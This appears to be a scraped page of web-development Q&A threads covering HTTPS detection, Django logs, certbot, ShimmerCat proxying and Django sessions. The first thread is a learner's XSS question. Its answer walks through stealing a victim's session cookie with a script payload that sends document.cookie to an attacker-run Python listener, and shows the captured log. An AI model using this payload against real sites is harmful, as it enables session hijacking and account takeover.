XSS Attack without Web Hosting - xss

I am learning about XSS attacks.
Suppose I have a website (let's call it http://www.animallover.com) which allows me to enter anything into a search bar to search for animal names. The website is vulnerable, as entering <script>alert(1)</script> into the search bar triggers an alert.
My goal is to steal the user's cookie by asking the user to visit http://www.animallover.com.
I don't have a web server to host my cookie-capture script.
What should I do?

You can set up an HTTP server on your own computer quite easily.
For example, Python 3 supports the following one-liner HTTP server:
python -m http.server 8000
This will respond to HTTP requests arriving at port 8000 on your system. Bear in mind that you might need to adjust your firewall and set up port forwarding on your router to allow traffic through to this port. And make sure you enter this command inside an empty folder, as everything inside it will be published on the internet.
All incoming requests will be logged on the command line terminal. So if you're trying to fetch an admin's cookie value, you could create a link like this (I'm assuming here that your IP address is 12.34.56.78; you can get the correct value from Google):
http://example.com/search?q=%3Cscript%3Elocation.href%3D%27http%3A%2F%2F12.34.56.78%3A8000%2F%3F%27%2Bbtoa%28document.cookie%29%3B%3C%2Fscript%3E
This will run the following script on the target server:
<script>location.href='http://12.34.56.78:8000/?'+btoa(document.cookie);</script>
The cookie value will be base64 encoded, so you'll need to decode that when it arrives. The log output will look something like this:
$ python -m http.server 8000
99.99.99.99 - - [01/Jan/2021 01:23:45] "GET /?dXNlcj1hZG1pbjsgc2Vzc2lvbl9pZD0xMjM0NTY3OAo= HTTP/1.1" 200 -

Related

How to use CGI to Determine if URL Request is using HTTPS?

I am trying to switch our site from HTTP to HTTPS. In some scenarios, we need the site to use HTTP and at other times, HTTPS. I inted to use CGI to determine whether the request is HTTP or HTTPS.
As far as I can tell, the JSON requests must match the original protocol request. If you request, HTTP:// example.org you must call JSON with HTTP:// example.org /file.JSON. If you request, HTTPS:// example.org/ you must call JSON with HTTPS:// example.org/file.JSON.
Normally, I would use CGI variables to tell me whether the request is HTTP or HTTPS. I can test for CGI.HTTPS to see if it is on or off. I can check CGI.SERVER_PORT too see if it is 80 or 443. I can check CGI.SERVER_PORT_SECURE to see if it is 0 or 1.
When I view our web site in every browser, I can dump the CGI variables and get what I expect 100% of the time.
When a few other people in our office and outside our office make the same request, they get CGI variable values that suggest their request is NOT secure. CGI.HTTPS will show off. CGI.SERVER_PORT will show 40. CGI.SERVER_PORT_SECURE will show 0. Every other indicator will show that the site is secure in every browser, but the CGI variable values say it's not secure.
The site behaves flawlessly 100% for everyone for dev and stage. Only in live, which is behind a load balancer, does this issue exist (for some people).
Is this a load balancer issue? Is this certificate settings issue? Why are my CGI variables lying to me? How can I work around this issue?

Prevent Suspicios actions in django

I have following suspicious logs in my django output logs. Somebody is doing vulnerability check or what?
Invalid HTTP_HOST header: '47.95.231.250:58204'. You may need to add '47.95.231.250' to ALLOWED_HOSTS.
[03/Dec/2017 20:09:28] "GET http://47.95.231.250:58204/ip_js.php?IP=my_ip&DK=my_port&DD=FOQGCINPZHEHIIFR HTTP/1.0" 400 62446
How can I prevent it? Tried to block 47.95.231.250 IP, but didn't help. Request is coming from different IP address probably
Check your server - you will very likely find that 47.95.231.250 is your own server's IP address! This error indicates that someone is able to get to your server but that your Django application is not set to respond to the requests based on IP address. If it is working otherwise then you actually have ALLOWED_HOSTS set correctly based on domain name. Do NOT add the IP address to your ALLOWED_HOSTS unless you actually want to access it by IP address, which is usually not necessary in a production system.
So the IP address access is an indication of someone trying to get it that shouldn't be allowed. The port 58204 is also a clue. Regular ports for most web servers are 80 & 443. Occasionally, in order to have alternate ports for different applications, you will see 8000 or 8080 or other numbers. 58204 is not a typical web site port number. The third clue is that the requested file is ip_js.php which indicates a request for a PHP-based web site and not Django/Python.
Bottom line: See if you can configure your firewall to allow ONLY the necessary open ports from the outside world in to your server. Typically this will include:
80 - http
443 - https
22 - ssh
and possibly others depending on how your server is configured and what applications it runs. For example, if you host MySQL or another database on the same box then you will need to open additional ports if-and-only-if you require remote access to the database outside of the application.

Incorrect validation on ssl

I was trying to set up ssl using certbot. My webserver is nginx. when I run the command "sudo ./certbot-auto certonly" I enter my domain, which I purchased using netfirms. The domain is pointed to my amazon ec2 instance( public ip). I get this error " Type: unauthorized Detail: Incorrect validation certificate for TLS-SNI-01 challenge." Why is this happening?
I'm assuming it's the apache plugin that you are using.
The way the apache plugin works is that it adds a temporary with a "fake" certificate and SNI hostname that solves the TLS-SNI-01 challenge. Since this server has multiple IP addresses, I'm not certain if the apache plugin is capable of determining the correct IP address to listen on for this temporary . I haven't seen any success stories that explicitly mention this scenario, at least.
Your best bet might be to switch to the webroot plugin, which works by writing files to your existing DocumentRoot. If you'd like to continue using the automatic apache configuration while using the webroot authenticator, try something like this:
./certbot-auto --authenticator webroot --installer apache -w /var/www/html -d example.com
I had a similar problem - only when trying to update an existing key.
What I noticed was that the validation error said the it found a certificate that had all the other domain names in it that I had already requested in the certificate before.
Why does the validator see the previous certificate?
From the logs it seems to set up a new VirtualHost for each domain in the new cert in order to verify that the server is the one pointed to by the DNS. Validation requests to these mini VirtualHosts are not working correctly if it is seeing the existing cert with every domain in it - I though "my virtualhosts set up is somehow causing a problem!"
I thought maybe because I have a wildcard in my virtualHost it is somehow getting picked up before the mini temporary VirtualHosts.
I had named my existing hosts with 3 digit numeric prefixes so that I could carefully order them given that Apache said it processes .conf files in alphabetical order. This would mean they would get processed BEFORE any other .conf files starting with a letter.
I renamed my .conf files by adding a 'c' prefix before the number and now it appears at though it's working because it got passed the verification phase at least now - except now I have exceeded by 20 key requests for the week so I can't complete the process just yet!! Doh!

ShimmerCat with reverse proxy when using "the old way"

I have used ShimmerCat with sc-tool to connect to my development sites as described here, and everything has worked always like a charm with it, but I also wanted to follow the "old way" configuring my /etc/hosts. In this case I had a small problem, the server ran ok, and I could access to my development site (let's say that I used https://www.example.com:4043/), but I'm also using a reverse proxy as described on this article, and on the config file reference. It redirects to a Django app I'm using. Let's say it is my devlove.yaml config file:
---
shimmercat-devlove:
domains:
www.example.com:
root-dir: site
consultant: 8080
cache-key: xxxxxxx
api.example.com:
port: 8080
The problem is that when I try to access to a URL that requests the API, a 404 response is sent from the API. Let me try to explain it through an example. I try to access to https://www.example.com:4043/country/, and on this page I do a request to the API: /api/<country>/towns/, then the API endpoint is returning a 404 response so it is not finding this URL, which does not happen when using Google Chrome with sc-tool. I had set both domains www.example.com, and api.example.com on my /etc/hosts. I have been trying to solve it, but without any luck, is there something I'm missing? Any help will be welcome. Thanks in advance.
With a bit more of data, we may be able to find the issue. In the meantime, here is a list of troubleshooting tips:
Possible issue: DNS is cached in browser, /etc/hosts is not being used (yet)
This can happen if somehow your browser has not done a DNS lookup since before you changed your /etc/hosts file. Then the connection is going to a domain in the Internet that may not have the API endpoint that you are calling.
Troubleshooting: Check ShimmerCat's log for the requests. If this is the issue, closing and opening the browser may solve the issue.
Possible issue: the host header is incorrect
ShimmerCat uses the Host header in HTTP/1.1 requests and the :authority header in HTTP/2 requests to distinguish the domains. It always discards any port number present in them. If these headers are not set or are set to a domain other than the ones ShimmerCat is configured to listen, the server will consider the situation so despicable that it will just close the connection.
Troubleshooting: This is not a 404 error, but a connection close (if trying to connect un-proxied, directly to the SSL port where ShimmerCat is listening), or a Socks Connection Failed (if trying to connect through ShimmerCat's built-in SOCKS5 proxy). In the former case, the server will print the message "Rejected request to Just https://some-domain-or-ip/some/path" in his log, using the actual value for the domain, or "Rejected request to Nothing", if no header was present. The second case is more complicated, because the SOCKS5 proxy is before the HTTP routing algorithm.
In any case, the browser will put a red line in the network panel of the developer tools. If you are accessing the server using curl, like this:
curl -k -H host:api.incorrect-domain.com https://127.0.0.1:4043/contents/blog/data-density/
or like
curl -k -H host:api.incorrect-domain.com
(notice the --http2 parameter in the second form), you will get a response:
curl: (56) Unexpected EOF
Extra-tip: There is a field for the network address in the browser's developer tools. Check it, it may tell you something!
Possible issue: something gets messed up when passing the request to the api back-end.
API backends are also sensitive to the host header, and to additional things like authentication cookies and request parameters.
Troubleshooting: A way to diagnose things is invoking ShimmerCat using the --show-proxied-headers command-line option. It makes ShimmerCat to report the proxied headers to the log:
Issuing request with headers :authority: api.example.com
:method: GET
:path: /my/api/endpoint/path/
:scheme: https
accept: */*
user-agent: curl/7.47.0
Possible issue: there are two instances or more of ShimmerCat running
...and they are using different configurations. ShimmerCat uses port sharing among several processes to increase availability. A downside of this is that is perfectly possible to mistakenly start ShimmerCat, forget about stopping it, and start it again after changing some configuration bit. The two instances will be running at the same time, and any of them will pick connections made to the listening port.
Troubleshooting: Shutdown all instances of ShimmerCat, then double-check there are none running by using the corresponding form of the ps command, and start the server with the configuration you want.

Django+apache: HTTPS only for login page

I'm trying to accomplish the following behaviour:
When the user access to the site by means of:
http://example.com/
I want him to be redirected to:
https://example.com/
By middleware, if user is not logged in, the login template is rendered when accessing /. If the user is logged, / is the main view. When the user logs in, I want the site working by http.
To do so, I am running the same server on ports 80 and 443 (is this really necessary? I have the impression that i'm running two separate servers with the same application while I want a server listening to two ports).
When the user navigates away from login, due to the redirection to http server the data in request.session is not present (altough it is present on https), thus showing that there is no user logged. So, considering the set up of apache is correct (running the same server on two different ports) I guess I have to pass the cookie from the server running on https over to http.
Can anybody shed some light on this? Thank you
First off make sure that the setting SESSION_COOKIE_SECURE is set to false. As long as the domains are the same the cookies on the browser should be present and so the session information should still be there.
Take a look at your cookies using a plugin. Search for the session cookie you have set. By default these cookies are named "sessionid" by Django. Make sure the domains and paths are in fact correct for both the secure session and regular session.
I want to warn against this however. Recently things like Firesheep have exploited an issue that people have known but ignored for a long time, that these cookies are not secure in any way. It would be easy for someone to "sniff" the cookie over the HTTP connection and gain access to the site as your logged in user. This essentially eliminates the entire reason you set up a secure connection to log in in the first place.
Is there a reason you don't have a secure connection across the entire site? Traditional arguments about it being more intensive on the server really don't apply with modern CPUs any longer and the exploits that I refer to above are becoming so prevalent that the marginal (really marginal) cost of encrypting all of your traffic is well worth it.
Apache needs to have essentially 2 different servers running because a.) it is listening on 2 different ports and b.) one is adding some additional encryption logic. That said this is a normal thing for Apache. I run servers with dozens of "servers" running on different ports and doing different logic. In the grand scheme of things, this shouldn't really weight your server down.
That said once you pass the same request to *WSGI or mod_python, you will then have to have logic to make sure that no one tries to log in over your non-encrypted connection because the only difference to Django will be the response in request.is_secure(). All the URLs and views in your urlconf will be accessible.
Whew that is a lot. I hope that helps.